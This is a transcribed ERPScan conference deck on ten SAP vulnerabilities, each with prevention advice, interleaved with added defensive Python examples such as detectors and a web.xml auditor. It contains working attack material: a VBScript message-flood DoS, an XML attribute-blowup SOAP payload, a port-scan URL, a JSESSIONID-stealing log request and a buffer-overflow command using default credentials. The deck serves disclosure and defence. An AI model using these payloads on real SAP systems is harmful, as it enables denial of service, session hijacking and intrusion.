Invest in security to secure investments

SAP (In)Security: New and Best

Alexander Polyakov, CTO at ERPScan

About ERPScan

• The only 360-degree SAP security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

What is SAP?

Shut up And Pay

Really

• The most popular business application
• More than 120000 customers
• 74% of Forbes 500

Agenda

• Intro
• SAP security history
• SAP on the Internet
• Most popular SAP issues (OLD)
• Top 10 latest interesting attacks (NEW)
• DEMOs
• Conclusion

3 areas of SAP Security

2010 - Application platform security
Prevents unauthorized access by both insiders and remote attackers
Solution: Vulnerability Assessment and Monitoring

2008 - ABAP Code security
Prevents attacks or mistakes made by developers
Solution: Code audit

2002 - Business logic security (SOD)
Prevents attacks or mistakes made
Solution: GRC

Talks about SAP security

[Chart: number of talks about SAP security per year, 2006-2012 (y-axis 0-35)]

Most popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.

SAP Security notes

[Chart: number of SAP Security notes per year, 2001-2012 (y-axis 0-900)]

By April 26, 2012, a total of 2026 notes

SAP vulnerabilities by type

[Chart: number of SAP vulnerabilities per type (x-axis 0-350); types as listed below]

12 - SQL Injection
11 - BOF
10 - Denial of service
9 - Remote Code Execution
8 - Verb tampering
7 - Code injection vulnerability
6 - Hard-coded credentials
5 - Unauthorized usage of application
4 - Information Disclosure
3 - Missing Auth check
2 - XSS/Unauthorised modification of
1 - Directory Traversal

Stats from:
• 1Q 2012
• 1Q 2010
• 4Q 2009

Top problems by OWASP-EAS (Implementation issues)

• EASAI-1 Lack of patch management
• EASAI-2 Default passwords for application access
• EASAI-3 SOD conflicts
• EASAI-4 Unnecessary enabled application features
• EASAI-5 Open remote management interfaces
• EASAI-6 Lack of password lockout/complexity checks
• EASAI-7 Insecure options
• EASAI-8 Unencrypted communications
• EASAI-9 Insecure trust relations
• EASAI-10 Guest access

Top problems by BIZEC

• BIZEC TEC-01: Vulnerable Software in Use
• BIZEC TEC-02: Standard Users with Default Passwords
• BIZEC TEC-03: Unsecured SAP Gateway
• BIZEC TEC-04: Unsecured SAP/Oracle authentication
• BIZEC TEC-05: Insecure RFC interfaces
• BIZEC TEC-06: Insufficient Security Audit Logging
• BIZEC TEC-07: Unsecured SAP Message Server
• BIZEC TEC-08: Dangerous SAP Web Applications
• BIZEC TEC-09: Unprotected Access to Administration Services
• BIZEC TEC-10: Insecure Network Environment
• BIZEC TEC-11: Unencrypted Communications

Business Risks

Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing suppliers and customers list
• Stealing HR data

Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations

Fraud
• False transactions
• Modification of master data
• etc.

SAP on the Internet

MYTH: attacks on SAP systems are available only to insiders

• We have collected data about SAP systems on the WEB
• Have various stats by countries, applications, versions
• Information from Google, Shodan, Nmap scan

SAP on the Internet

About 5000 systems including Dispatcher, Message server, SapHostcontrol, Web services

Top 10 vulnerabilities 2011-2012

1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
  
10 – GUI-Scripting DOS: Description

• SAP users can run scripts which automate their user functions
• A script has the same rights in SAP as the user who launched it
• The security message which is shown to the user can be turned off in the registry
• Almost any user can use SAP Messages (SM02 transaction)
• It is possible to run a DoS attack on any user using a simple script

New
Author: Dmitry Chastukhin (ERPScan)

10 – GUI-scripting: Details

    ' Attach to the running SAP GUI scripting engine and take the first connection and session
    If Not IsObject(application) Then
      Set SapGuiAuto = GetObject("SAPGUI")
      Set application = SapGuiAuto.GetScriptingEngine
    End If
    If Not IsObject(connection) Then
      Set connection = application.Children(0)
    End If
    If Not IsObject(session) Then
      Set session = connection.Children(0)
    End If
    If IsObject(WScript) Then
      WScript.ConnectObject session, "on"
      WScript.ConnectObject application, "on"
    End If
    ' Loop: open transaction SM02, create a system message and send it, 1000 times
    do
      a=a+1
      session.findById("wnd[0]").maximize
      session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
      session.findById("wnd[0]/tbar[0]/btn[0]").press
      session.findById("wnd[0]/tbar[1]/btn[34]").press
      session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
      session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
      session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
      session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
      session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
      session.findById("wnd[1]").sendVKey 4
      session.findById("wnd[2]/usr/lbl[1,3]").setFocus
      session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
      session.findById("wnd[2]").sendVKey 2
      session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
      session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
      session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
      session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
      session.findById("wnd[1]/tbar[0]/btn[0]").press
    Loop Until a>=1000

10 – GUI-scripting: Other attacks

Other attacks like changing banking accounts in LFBK are also possible

Script can be uploaded using:
• SAPGUI ActiveX vulnerability
• Teensy USB flash
• Any other method of client exploitation

10 – GUI-scripting: Business risks

Ease of exploitation – Medium
Sabotage – High
Espionage – No
Fraud – No

10 – GUI-scripting: Prevention

• SAP GUI Scripting Security Guide
• sapgui/user_scripting = FALSE
• Block registry modification on workstations
  
9 – XML Blowup DOS: Description

• The WEBRFC interface can be used to run RFC functions
• By default any user can have access
• Can execute at least RFC_PING
• SAP NetWeaver is vulnerable to malformed XML packets
• It is possible to run a DoS attack on the server using a simple script
• It is possible to run it over the Internet!

New
Author: Alexey Tyurin (ERPScan)

9 – XML Blowup DOS: Details

    <SOAP-ENV:Envelope
      xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <SOAP-ENV:Body>
        <m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions"
          a1="" a2="" ... a10000="">
        </m:RFC_PING>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

9 – XML Blowup DOS: Business risks

Ease of exploitation – Medium
Espionage – No
Fraud – No
Sabotage – Critical

9 – XML Blowup DOS: Prevention

• Disable WEBRFC
• Prevent unauthorized access to WEBRFC using S_ICF
• Install SAP notes 1543318 and 1469549
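A defensive pre-check for a WEBRFC-style endpoint, as an added example that is not ERPScan's or SAP's code: it streams an incoming SOAP body and rejects any element carrying more attributes than a legitimate RFC call would use, so a request shaped like the a1..a10000 RFC_PING above is dropped before the backend parser touches it. The thresholds, the build_rfc_ping helper and the test payloads are assumptions constructed for this example.

```python
"""Pre-filter for SOAP bodies sent to a WEBRFC-style endpoint.

Added example, not ERPScan's or SAP's code. MAX_ATTRS_PER_ELEMENT and
MAX_BODY_BYTES are assumed thresholds chosen for illustration; tune them
to the largest legitimate request the interface actually receives.
"""
from io import BytesIO
from typing import Tuple
import xml.etree.ElementTree as ET

MAX_ATTRS_PER_ELEMENT = 64      # assumed: real RFC calls carry a handful
MAX_BODY_BYTES = 256 * 1024     # assumed: cap the whole request body first


def check_soap_request(body: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason).

    The size check runs before any parsing; the attribute check uses a
    streaming parse ('start' events only), so the filter itself never
    materialises the full tree of a hostile document.
    """
    if len(body) > MAX_BODY_BYTES:
        return False, f"body too large ({len(body)} bytes)"
    try:
        for _event, elem in ET.iterparse(BytesIO(body), events=("start",)):
            count = len(elem.attrib)
            if count > MAX_ATTRS_PER_ELEMENT:
                return False, f"{elem.tag} carries {count} attributes"
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    return True, "ok"


def build_rfc_ping(n_attrs: int) -> bytes:
    """Constructed test input: an RFC_PING envelope padded with n dummy
    attributes, shaped like the request on the slide."""
    attrs = " ".join(f'a{i}=""' for i in range(1, n_attrs + 1))
    return (
        '<SOAP-ENV:Envelope '
        'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
        '<SOAP-ENV:Body>'
        f'<m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" {attrs}>'
        '</m:RFC_PING>'
        '</SOAP-ENV:Body></SOAP-ENV:Envelope>'
    ).encode()


if __name__ == "__main__":
    for n in (3, 10000):
        print(n, check_soap_request(build_rfc_ping(n)))
```

The body-size limit alone would not stop the slide's payload: ten thousand empty attributes weigh under 100 KB, so it is the per-element attribute count that rejects it. Keep the filter in front of the real parser; it is not a substitute for disabling WEBRFC or restricting it with S_ICF.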
  
8 – BAPI script injection/hash stealing: Description

• The SAP BAPI transaction fails to properly sanitize input
• Possible to inject JavaScript code or a link to a fake SMB server
• SAP GUI clients use Windows, so their credentials will be transferred to the attacker's host

New
Author: Dmitry Chastukhin (ERPScan)

8 – BAPI script injection/hash stealing: Demo

8 – BAPI script injection/hash stealing: Business risks

Ease of exploitation – Low
Sabotage – High
Espionage – High
Fraud – High

7 – SAP GUI bad encryption: Description

• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in a .sap file
• This password uses a byte-XOR algorithm with a "secret" key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted in 1 second

New
Author: Alexey Sintsov (ERPScan)

7 – SAP GUI bad encryption: Demo

7 – SAP GUI bad encryption: Business risks

Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium

7 – SAP GUI bad encryption: Prevention

• Disable password storage in GUI
  
6 – Remote port scan via JSP: Description

• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable

    /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=

Author: Alexander Polyakov (ERPScan)

6 – Remote port scan via JSP: Demo

[Demo screenshots: responses for a closed port, an HTTP port and an SAP port]

6 – Remote port scan via JSP: Business risks

Ease of exploitation – High
Espionage – Medium
Fraud – No
Sabotage – Low

6 – Remote port scan via JSP: Prevention

• Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
• Disable unnecessary applications
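Detection logic for this issue, as an added example that is not from the presentation: it parses constructed web-server access-log lines, groups requests to the BufferOverview.jsp path by client address, and raises an alert when one client probes several distinct server/port pairs or points the server parameter at a private address. The log format (Common Log Format), the threshold and the sample lines are assumptions.

```python
"""Spot port-scan-via-JSP activity in web access logs.

Added example, not from the presentation. The log format (Common Log
Format), the alert threshold and the sample lines are assumptions.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

PROBE_PATH = "/ipcpricing/ui/BufferOverview.jsp"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def _probe_line(ip, second, server, port):
    """Constructed CLF line for one BufferOverview.jsp request."""
    return (f'{ip} - - [26/Apr/2012:10:00:{second:02d} +0000] '
            f'"GET {PROBE_PATH}?server={server}&port={port}'
            f'&password=&dispatcher=&targetClient=&view= HTTP/1.1" 200 512')


# Constructed sample: one client walks five ports on an internal host, another
# fetches an unrelated page, a third sends a single probe at a hostname.
SAMPLE_LOG = [
    _probe_line("203.0.113.7", 1, "172.16.0.13", 3200),
    _probe_line("203.0.113.7", 2, "172.16.0.13", 3300),
    _probe_line("203.0.113.7", 3, "172.16.0.13", 8000),
    _probe_line("203.0.113.7", 4, "172.16.0.13", 50000),
    _probe_line("203.0.113.7", 5, "172.16.0.13", 31337),
    '10.0.0.5 - - [26/Apr/2012:10:00:06 +0000] "GET /irj/portal HTTP/1.1" 200 2048',
    _probe_line("198.51.100.9", 7, "intranet.example.com", 80),
]


def parse_line(line):
    """Split one CLF line into fields plus the decoded path and query; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in
                    parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def is_private_target(host):
    """True when the server parameter is an RFC 1918 / private address."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False   # hostnames are not classified here


def detect_port_scan(lines, threshold=5):
    """Return alerts as (kind, client_ip, detail) tuples."""
    targets = defaultdict(set)     # client -> {(server, port)}
    internal = defaultdict(set)    # client -> {private server addresses}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != PROBE_PATH:
            continue
        server = rec["query"].get("server", "")
        port = rec["query"].get("port", "")
        targets[rec["ip"]].add((server, port))
        if is_private_target(server):
            internal[rec["ip"]].add(server)
    alerts = []
    for ip, pairs in targets.items():
        if len(pairs) >= threshold:
            alerts.append(("port-scan", ip, len(pairs)))
        if ip in internal:
            alerts.append(("internal-target", ip, sorted(internal[ip])))
    return alerts


if __name__ == "__main__":
    for alert in detect_port_scan(SAMPLE_LOG):
        print(alert)
```

Until the notes are applied or the application is disabled, a rule like this on the reverse proxy or SIEM gives early warning that the JSP is being used as a scanner; the internal-target alert fires on a single request, because no external client has a legitimate reason to hand the page a private address.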
  
5 – MMC JSESSIONID stealing: Description

• Remote management of the SAP platform
• By default, many commands go without auth
• Exploits implemented in Metasploit (by ChrisJohnRiley)
• Most of the bugs are information disclosure
• It is possible to find information about JSESSIONID
• Only if trace is ON

Can be authenticated as an existing user remotely

1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)
New

5 – MMC SESSIONID stealing: Details

    <?xml version="1.0" encoding="UTF-8" ?>
    <SOAP-ENV:Envelope
      xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xs="http://www.w3.org/2001/XMLSchema">
      <SOAP-ENV:Header>
        <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
          <enableSession>true</enableSession>
        </sapsess:Session>
      </SOAP-ENV:Header>
      <SOAP-ENV:Body>
        <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
          <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
          <filter></filter>
          <language></language>
          <maxentries>100</maxentries>
          <statecookie>EOF</statecookie>
        </ns1:ReadLogFile>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

5 – MMC JSESSIONID stealing: Business risks

Espionage – Critical
Sabotage – Medium
Fraud – High
Ease of exploitation – Medium

5 – MMC JSESSIONID stealing: Prevention

• The JSESSIONID by default will not be logged in the log file
• Don't use TRACE_LEVEL = 3 on production systems, or delete the traces after use
• Other info: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
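Two defender-side checks for this technique, added here as an example and not part of the original deck: a scan of J2EE trace or log text that reports and redacts any JSESSIONID value that was written to disk (the condition the slide describes when tracing is on), and an audit of a captured SAPControl request that flags ReadLogFile calls coming from hosts outside the administration set. The trace lines, the admin allow-list and the heuristics are constructed assumptions; the SOAP sample is a copy of the request shown above.

```python
"""Session-ID leak checks for the SAPControl/MMC log-reading technique.

Added example, not part of the original deck. The trace lines, the admin
allow-list and the detection heuristics are constructed assumptions.
"""
import re
import xml.etree.ElementTree as ET

SESSION_RE = re.compile(r"(JSESSIONID=)([A-Za-z0-9_.!\-]+)")
SAPCONTROL_NS = "{urn:SAPControl}"

# Constructed trace lines: two of them carry a session cookie verbatim.
SAMPLE_TRACE = [
    "2012-04-26 10:00:01 [HTTP Worker 1] GET /irj/portal "
    "Cookie: JSESSIONID=ABCDEF0123456789abcdef.server0 user=admin",
    "2012-04-26 10:00:02 [HTTP Worker 1] GET /irj/portal user=jdoe",
    "2012-04-26 10:00:03 [HTTP Worker 2] Set-Cookie: JSESSIONID=ZZZ999xyz.server0; Path=/",
]

# Copy of the SAPControl request from the slide, used as captured input.
SAMPLE_REQUEST = """<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter></filter><language></language>
      <maxentries>100</maxentries><statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


def find_session_leaks(lines):
    """Return ([(line_no, session_id), ...], redacted_lines)."""
    hits, redacted = [], []
    for n, line in enumerate(lines, 1):
        for m in SESSION_RE.finditer(line):
            hits.append((n, m.group(2)))
        redacted.append(SESSION_RE.sub(r"\1<redacted>", line))
    return hits, redacted


def readlogfile_targets(soap_xml):
    """Filenames requested by every ReadLogFile call in a SAPControl envelope."""
    root = ET.fromstring(soap_xml)
    return [call.findtext("filename", default="").strip()
            for call in root.iter(SAPCONTROL_NS + "ReadLogFile")]


def audit_sapcontrol_request(soap_xml, source_ip, admin_hosts):
    """Findings for one captured request: a log read from a non-admin host,
    and any read that targets the server's log directory at all."""
    findings = []
    for name in readlogfile_targets(soap_xml):
        if source_ip not in admin_hosts:
            findings.append(("readlogfile-from-non-admin", source_ip, name))
        if "/log/" in name or name.endswith((".log", ".trc")):
            findings.append(("log-read", source_ip, name))
    return findings


if __name__ == "__main__":
    print(find_session_leaks(SAMPLE_TRACE)[0])
    print(audit_sapcontrol_request(SAMPLE_REQUEST, "203.0.113.7", {"10.0.0.5"}))
```

Run the first check over archived traces after a period of TRACE_LEVEL 3 to know whether anything has to be invalidated before the files are deleted; the second belongs on whatever sees traffic to the sapstartsrv port, since an unauthenticated ReadLogFile from an unexpected source is exactly the request shown on the Details slide.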
  
4 – Remote command execution in TH_GREP: Description

• RCE vulnerability in RFC module TH_GREP
• Found by Joris van de Vis
• SAP was not properly patched (1433101)
• We have discovered that the patch can be bypassed in Windows

Original bug by Joris van de Vis (erp-sec)
Bypass by Alexey Tyurin (ERPScan)

4 – RCE in TH_GREP: Details

    elseif opsys = 'Windows NT'.
      " Windows branch: the search string goes inside /c:"..." without any escaping
      concatenate '/c:"' string '"' filename into grep_params in character mode.
    else. " if linux
      " Linux branch (the patched path): every single quote in the search string
      " is escaped as '"'"' before the string is wrapped in single quotes
      replace all occurrences of '''' in local_string with '''"''"'''.
      concatenate '''' local_string '''' filename into grep_params in character mode.
    endif.

4 – RCE in TH_GREP: Demo #1

4 - RCE in TH_GREP: More details

4 ways to execute the vulnerable program

• Using transaction "SE37"
• Using transaction "SM51" (thanks to Felix Granados)
• Using remote RFC call "TH_GREP"
• Using SOAP RFC call "TH_GREP" via web

4 – RCE in TH_GREP: Demo #2

4 – RCE in TH_GREP: Business risks

Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium

4 – RCE in TH_GREP: Prevention

• Install SAP notes 1580017, 1433101
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for similar vulnerabilities
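The Linux branch of the snippet above escapes each single quote as '"'"' and wraps the result in single quotes, which is exactly what Python's shlex.quote produces; the Windows branch only wraps the string in /c:"..." and escapes nothing. As an added example (not SAP's or ERPScan's code), the block below reproduces the Linux escaping, confirms it against shlex.quote, shows what a POSIX shell would actually receive as arguments, and adds the allow-list check a custom Z-transaction should apply before concatenating anything into a command line. The allow-list pattern and the sample file path are assumptions.

```python
"""Shell-argument handling around a grep-style wrapper.

Added example, not SAP's or ERPScan's code. SAFE_SEARCH is an assumed
allow-list; widen it only for characters the search really needs.
"""
import re
import shlex

SAFE_SEARCH = re.compile(r"[A-Za-z0-9_ .:/\-]*")


def quote_like_th_grep_linux(search: str) -> str:
    """Mirror the patched Linux branch: ' becomes '"'"', then wrap in single quotes."""
    return "'" + search.replace("'", "'\"'\"'") + "'"


def build_grep_params_linux(search: str, filename: str) -> str:
    """Command tail as the Linux branch assembles it: quoted search, then filename."""
    return quote_like_th_grep_linux(search) + " " + filename


def shell_argv(params: str):
    """Arguments a POSIX shell would hand to grep for this command tail."""
    return shlex.split(params)


def validate_search(search: str) -> bool:
    """Allow-list check to run before any concatenation, on every OS branch.

    Rejecting quotes and shell metacharacters up front means the Windows
    branch, which escapes nothing, never sees a string that can close its
    /c:"..." wrapper; the escaping then becomes defence in depth.
    """
    return SAFE_SEARCH.fullmatch(search) is not None


if __name__ == "__main__":
    tail = build_grep_params_linux("it's a $test", "/usr/sap/trace/dev_w0")
    print(tail)
    print(shell_argv(tail))
    print(validate_search("ERROR 500"), validate_search('a"b'))
```

The point the assertions make is that with correct quoting the shell sees exactly two arguments, the search string and the file name, whatever the search contains; the Windows branch cannot guarantee that, so the validation step has to run before the branch is chosen.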
  
3 - ABAP Kernel BOF: Description

• Presented by Andreas Wiegenstein at BlackHat EU 2011
• Buffer overflow in SAP kernel function C_SAPGPARAM
• When the NAME field is more than 108 chars
• Can be exploited by calling an FM which uses C_SAPGPARAM
• Example of a report – RSPO_R_SAPGPARAM

Author: (VirtualForge)

3 - ABAP Kernel BOF: Details

    > startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 -u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E
    NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAA -t 4
    RFC Call/Exception: SYSTEM_FAILURE
    Group Error group 104
    Key RFC_ERROR_SYSTEM_FAILURE
    Message connection closed without message (CM_NO_DATA_RECEIVED)

3 – ABAP Kernel BOF: Business risks

Ease of exploitation – Medium
Espionage – Critical
Fraud – Critical
Sabotage – Critical

3 – ABAP Kernel BOF: Prevention

• Install SAP notes:
  - 1493516 – Correcting buffer overflow in ABAP system call
  - 1487330 – Potential remote code execution in SAP Kernel
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for critical calls
  
2 – Invoker Servlet: Description

• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from the application
• Even if it is not declared in WEB.XML

Can be used for auth bypass

2 - Invoker Servlet: Details

    <servlet>
      <servlet-name>CriticalAction</servlet-name>
      <servlet-class>com.sap.admin.Critical.Action</servlet-class>
    </servlet>
    <servlet-mapping>
      <servlet-name>CriticalAction</servlet-name>
      <url-pattern>/admin/critical</url-pattern>
    </servlet-mapping>
    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Restrictedaccess</web-resource-name>
        <url-pattern>/admin/*</url-pattern>
        <http-method>GET</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>admin</role-name>
      </auth-constraint>
    </security-constraint>

What if we call /servlet/com.sap.admin.Critical.Action?

Author: Dmitry Chastukhin (ERPScan)

2 – Invoker servlet: Business risks

Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High

2 - Invoker servlet: Prevention

• Update to the latest patch 1467771, 1445998
• The "EnableInvokerServletGlobally" property of the servlet_jsp must be "false"

If you can't install patches for some reason, you can check all WEB.XML files manually or using the ERPScan web.xml scanner.
  
1 – VERB Tampering

1st Place – Verb Tampering

    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Restrictedaccess</web-resource-name>
        <url-pattern>/admin/*</url-pattern>
        <http-method>GET</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>admin</role-name>
      </auth-constraint>
    </security-constraint>

What if we use HEAD instead of GET?

Author: Alexander Polyakov (ERPScan)

1st Place – Verb tampering: Details

Remotely without authentication!

• CTC – Secret interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
  – Add users
  – Add to groups
  – Run OS commands
  – Start/Stop J2EE

1 – Verb tampering: Demo

1 – Verb tampering: More details

If patched, can be bypassed by the Invoker servlet!

1 – Verb tampering: Business risks

Espionage – Critical
Sabotage – Critical
Fraud – Critical
Ease of use – Very easy!

1st Place – Verb tampering: Prevention

• Install SAP notes 1503579, 1616259
• Install other SAP notes about Verb Tampering (about 18)
• Scan applications using the ERPScan WEB.XML check tool or manually
• Secure WEB.XML by deleting all <http-method> elements
• Disable the applications that are not necessary
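The check that both the Invoker Servlet and the Verb Tampering prevention slides call for (scan WEB.XML for verb-tampering exposure and for servlet classes reachable through the invoker path), as an added example that is not ERPScan's scanner: it parses a web.xml, reports every security-constraint whose web-resource-collection lists explicit http-method elements, reports every declared servlet class whose /servlet/<class> path no constraint covers, and produces the hardened file with all http-method elements removed. The sample web.xml is built from the fragment on the Invoker Servlet slide; the coverage heuristic is an assumption.

```python
"""web.xml audit for verb tampering and invoker-servlet exposure.

Added example, not ERPScan's scanner. The sample document is built from the
slide's fragment; treating a constraint on /servlet/* or /* as "covering"
the invoker path is an assumed heuristic.
"""
import xml.etree.ElementTree as ET

# Constructed from the Invoker Servlet slide, wrapped in a web-app root.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>"""


def _local(tag):
    """Strip a namespace prefix so real web.xml files (xmlns=...) parse the same way."""
    return tag.split("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    return [(c.text or "").strip() for c in _children(elem, name)]


def audit_web_xml(xml_text):
    """Return findings as (kind, where, detail) tuples."""
    root = ET.fromstring(xml_text)
    findings = []
    protected = set()
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        for wrc in _children(sc, "web-resource-collection"):
            patterns = _texts(wrc, "url-pattern")
            methods = _texts(wrc, "http-method")
            protected.update(patterns)
            if methods:   # listing verbs limits the constraint to those verbs only
                findings.append((
                    "verb-tampering", ", ".join(patterns),
                    "only " + "/".join(methods)
                    + " is constrained; other verbs bypass the auth-constraint",
                ))
    invoker_covered = any(p in ("/servlet/*", "/*") for p in protected)
    if not invoker_covered:
        for servlet in _children(root, "servlet"):
            for cls in _texts(servlet, "servlet-class"):
                findings.append((
                    "invoker-servlet", "/servlet/" + cls,
                    "no constraint covers this path; reachable while "
                    "EnableInvokerServletGlobally is true",
                ))
    return findings


def harden_web_xml(xml_text):
    """Remove every http-method element so each constraint applies to all verbs."""
    root = ET.fromstring(xml_text)
    removed = 0
    for wrc in [e for e in root.iter() if _local(e.tag) == "web-resource-collection"]:
        for m in _children(wrc, "http-method"):
            wrc.remove(m)
            removed += 1
    return ET.tostring(root, encoding="unicode"), removed


if __name__ == "__main__":
    for finding in audit_web_xml(SAMPLE_WEB_XML):
        print(finding)
    hardened, n = harden_web_xml(SAMPLE_WEB_XML)
    print(n, "http-method element(s) removed")
```

The hardened output still reports the invoker-servlet finding, which is the right outcome: removing http-method elements fixes verb tampering, but the invoker path is closed by the EnableInvokerServletGlobally setting and the notes, not by web.xml alone.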
  
Conclusion

It is possible to be protected from almost all those kinds of issues, and we are working hard with SAP to make it secure

SAP Guides

It's all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties

Future work

Many of the researched things cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:

• Just4Meeting in July (Portugal)
• BlackHat USA in July (Las Vegas)

Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.

Web: www.erpscan.com
e-mail: info@erpscan.com, sales@erpscan.com
Twitter: @erpscan, @sh2kerr
 

Similar to SAP (in)security: New and best (20)

SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
EAS-SEC Project
